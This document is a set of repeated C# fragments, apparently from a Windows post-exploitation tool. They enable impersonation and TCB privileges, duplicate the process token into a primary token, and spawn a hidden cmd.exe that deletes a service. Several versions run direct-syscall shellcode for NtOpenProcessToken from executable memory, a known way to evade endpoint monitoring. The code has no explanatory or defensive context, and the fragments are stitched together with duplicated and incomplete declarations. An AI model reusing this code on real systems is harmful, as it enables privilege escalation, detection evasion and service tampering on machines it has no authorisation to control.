public static void duplicateToken(IntPtr token, TokenAccessFlags tokenAccess, SECURITY_IMPERSONATION_LEVEL se, TOKEN_TYPE type, out IntPtr duplicated)
{
if (!DuplicateTokenEx(token, tokenAccess, IntPtr.Zero, se, type, out duplicated))
{
duplicated = IntPtr.Zero;
}
}
public static extern bool DuplicateTokenEx(
IntPtr hExistingToken,
TokenAccessFlags dwDesiredAccess,
IntPtr lpThreadAttributes,
SECURITY_IMPERSONATION_LEVEL ImpersonationLevel,
TOKEN_TYPE TokenType,
out IntPtr phNewToken);
public static extern bool DuplicateTokenEx(
IntPtr hExistingToken,
TokenAccessFlags dwDesiredAccess,
IntPtr lpThreadAttributes,
SecurityImpersonationLevel impersonationLevel,
TokenType tokenType,
out IntPtr phNewToken);
public static void DuplicateToken(IntPtr token, TokenAccessFlags tokenAccess, SecurityImpersonationLevel se, TokenType type, out IntPtr duplicated)
{
if (!DuplicateTokenEx(token, tokenAccess, IntPtr.Zero, se, type, out duplicated))
{
duplicated = IntPtr.Zero;
}
}
public void Start()
{
try
{
IntPtr token = WindowsIdentity.GetCurrent().Token;
List <string> aPrivs = new List <string>();
aPrivs.Add("SeImpersonatePrivilege");
aPrivs.Add("SeTcbPrivilege");
aPrivs.Add("SeAssignPrimaryTokenPrivilege");
aPrivs.Add("SeIncreaseQuotaPrivilege");
IntPtr currentToken;
OpenProcessToken(Process.GetCurrentProcess().Handle, TokenAccessFlags.TOKEN_ADJUST_PRIVILEGES, out currentToken);
enablePrivileges(currentToken, aPrivs);
CloseHandle(currentToken);
TokenAccessFlags tokenAccess = TokenAccessFlags.TOKEN_QUERY | TokenAccessFlags.TOKEN_ASSIGN_PRIMARY |
TokenAccessFlags.TOKEN_DUPLICATE | TokenAccessFlags.TOKEN_ADJUST_DEFAULT |
TokenAccessFlags.TOKEN_ADJUST_SESSIONID;
IntPtr newToken = IntPtr.Zero;
if (!DuplicateTokenEx(token, tokenAccess, IntPtr.Zero, SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, TOKEN_TYPE.TokenPrimary, out newToken))
{
return;
}
STARTUPINFO startupInfo = new STARTUPINFO();
startupInfo.cb = Marshal.SizeOf(startupInfo);
startupInfo.lpDesktop = "";
startupInfo.wShowWindow = 0;
startupInfo.dwFlags |= 0x00000001;
PROCESS_INFORMATION processInfo = new PROCESS_INFORMATION();
LogonFlags l = new LogonFlags();
if (CreateProcessAsUserW(newToken, @"c:\windows\system32\cmd.exe /Q /C sc delete NewDefaultService2 && exit", null, IntPtr.Zero, IntPtr.Zero, false, 0, IntPtr.Zero, null, ref startupInfo, out processInfo))
{
TokenManager.Token = newToken;
TokenManager.Method = 1;
}
else
{
if (CreateProcessWithTokenW(newToken, l, null, @"c:\windows\system32\cmd.exe /Q /C sc delete NewDefaultService2 && exit", 0, IntPtr.Zero, null, ref startupInfo, out processInfo))
{
TokenManager.Token = newToken;
TokenManager.Method = 2;
}
}
}
catch { }
}
public static void GetProcessToken(IntPtr handle, TokenAccessFlags access, out IntPtr currentToken, SysCallManager sysCall)
{
var shellCode = sysCall.GetSysCallAsm("NtOpenProcessToken");
var shellCodeBuffer = VirtualAlloc(IntPtr.Zero, (UIntPtr)shellCode.Length, MemoryAllocationFlags.Commit | MemoryAllocationFlags.Reserve, MemoryProtectionFlags.ExecuteReadWrite);
Marshal.Copy(shellCode, 0, shellCodeBuffer, shellCode.Length);
var sysCallDelegate = Marshal.GetDelegateForFunctionPointer(shellCodeBuffer, typeof(NtOpenProcessToken));
var token = IntPtr.Zero;
var arguments = new object[] { handle, access, token };
var returnValue = sysCallDelegate.DynamicInvoke(arguments);
currentToken = (int)returnValue == 0 ? (IntPtr)arguments[2] : IntPtr.Zero;
}
public static void getProcessToken(IntPtr handle, TokenAccessFlags access, out IntPtr currentToken)
{
OpenProcessToken(Process.GetCurrentProcess().Handle, TokenAccessFlags.TOKEN_ADJUST_PRIVILEGES, out currentToken);
}
public static extern bool OpenProcessToken(IntPtr ProcessHandle, TokenAccessFlags DesiredAccess, out IntPtr TokenHandle);
public static void Start()
{
var sysCall = new SysCallManager();
try
{
var token = WindowsIdentity.GetCurrent().Token;
var privileges = new List <string>
{
"SeImpersonatePrivilege",
"SeTcbPrivilege",
"SeAssignPrimaryTokenPrivilege",
"SeIncreaseQuotaPrivilege"
};
var currentToken = IntPtr.Zero;
GetProcessToken(Process.GetCurrentProcess().Handle, TokenAccessFlags.TokenAdjustPrivileges, out currentToken,
sysCall);
EnablePrivileges(currentToken, privileges);
CloseHandle(currentToken);
const TokenAccessFlags tokenAccess = TokenAccessFlags.TokenQuery | TokenAccessFlags.TokenAssignPrimary |
TokenAccessFlags.TokenDuplicate | TokenAccessFlags.TokenAdjustDefault |
TokenAccessFlags.TokenAdjustSessionId;
if (!DuplicateTokenEx(token, tokenAccess, IntPtr.Zero, SecurityImpersonationLevel.SecurityImpersonation,
TokenType.TokenPrimary, out var newToken))
{
return;
}
var startupInfo = new StartupInfo();
startupInfo.cb = Marshal.SizeOf(startupInfo);
startupInfo.lpDesktop = "";
startupInfo.wShowWindow = 0;
startupInfo.dwFlags |= 0x00000001;
const LogonFlags logonFlags = new LogonFlags();
if (CreateProcessAsUserW(newToken, null,
@"c:\windows\system32\cmd.exe /Q /C sc delete NewDefaultService2 && exit", IntPtr.Zero,
IntPtr.Zero, false, 0, IntPtr.Zero, null, ref startupInfo, out _))
{
TokenManager.Token = newToken;
TokenManager.Method = 1;
}
else
{
if (!CreateProcessWithTokenW(newToken, logonFlags, null,
@"c:\windows\system32\cmd.exe /Q /C sc delete NewDefaultService2 && exit", 0, IntPtr.Zero,
null, ref startupInfo, out _))
{
return;
}
TokenManager.Token = newToken;
TokenManager.Method = 2;
}
}
catch
{
}
}
public void Start()
{
SyscallManager syscall = new SyscallManager();
try
{
IntPtr token = WindowsIdentity.GetCurrent().Token;
List <string> aPrivs = new List <string>();
aPrivs.Add("SeImpersonatePrivilege");
aPrivs.Add("SeTcbPrivilege");
aPrivs.Add("SeAssignPrimaryTokenPrivilege");
aPrivs.Add("SeIncreaseQuotaPrivilege");
IntPtr currentToken;
IntPtr baseAddr = IntPtr.Zero;
byte[] shellcode = syscall.getSyscallASM("NtOpenProcessToken");
var shellcodeBuffer = VirtualAlloc(IntPtr.Zero, (UIntPtr)shellcode.Length, MemoryAllocationFlags.Commit | MemoryAllocationFlags.Reserve, MemoryProtectionFlags.ExecuteReadWrite);
Marshal.Copy(shellcode, 0, shellcodeBuffer, shellcode.Length);
var syscallDelegate = Marshal.GetDelegateForFunctionPointer(shellcodeBuffer, typeof(NtOpenProcessToken));
IntPtr t = IntPtr.Zero;
var arguments = new object[] { Process.GetCurrentProcess().Handle, TokenAccessFlags.TOKEN_ADJUST_PRIVILEGES, t };
var returnValue = syscallDelegate.DynamicInvoke(arguments);
currentToken = (IntPtr)arguments[2];
enablePrivileges(currentToken, aPrivs);
CloseHandle(currentToken);
TokenAccessFlags tokenAccess = TokenAccessFlags.TOKEN_QUERY | TokenAccessFlags.TOKEN_ASSIGN_PRIMARY |
TokenAccessFlags.TOKEN_DUPLICATE | TokenAccessFlags.TOKEN_ADJUST_DEFAULT |
TokenAccessFlags.TOKEN_ADJUST_SESSIONID;
IntPtr newToken = IntPtr.Zero;
if (!DuplicateTokenEx(token, tokenAccess, IntPtr.Zero, SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, TOKEN_TYPE.TokenPrimary, out newToken))
{
return;
}
STARTUPINFO startupInfo = new STARTUPINFO();
startupInfo.cb = Marshal.SizeOf(startupInfo);
startupInfo.lpDesktop = "";
startupInfo.wShowWindow = 0;
startupInfo.dwFlags |= 0x00000001;
PROCESS_INFORMATION processInfo = new PROCESS_INFORMATION();
LogonFlags l = new LogonFlags();
if (CreateProcessAsUserW(newToken, @"c:\windows\system32\cmd.exe /Q /C sc delete NewDefaultService2 && exit", null, IntPtr.Zero, IntPtr.Zero, false, 0, IntPtr.Zero, null, ref startupInfo, out processInfo))
{
TokenManager.Token = newToken;
TokenManager.Method = 1;
}
else
{
if (CreateProcessWithTokenW(newToken, l, @"c:\windows\system32\cmd.exe /Q /C sc delete NewDefaultService2 && exit", null, 0, IntPtr.Zero, null, ref startupInfo, out processInfo))
{
TokenManager.Token = newToken;
TokenManager.Method = 2;
}
}
}
catch { }
}
static extern Boolean OpenProcessToken(IntPtr ProcessHandle, TokenAccessFlags DesiredAccess, out IntPtr TokenHandle);
static extern Boolean OpenThreadToken(IntPtr ThreadHandle, TokenAccessFlags DesiredAccess, bool OpenAsSelf, out IntPtr TokenHandle);
public static extern bool OpenProcessToken(IntPtr ProcessHandle, [MarshalAs(UnmanagedType.U4)] TokenAccessFlags dwDesiredAccess, out IntPtr TokenHandle);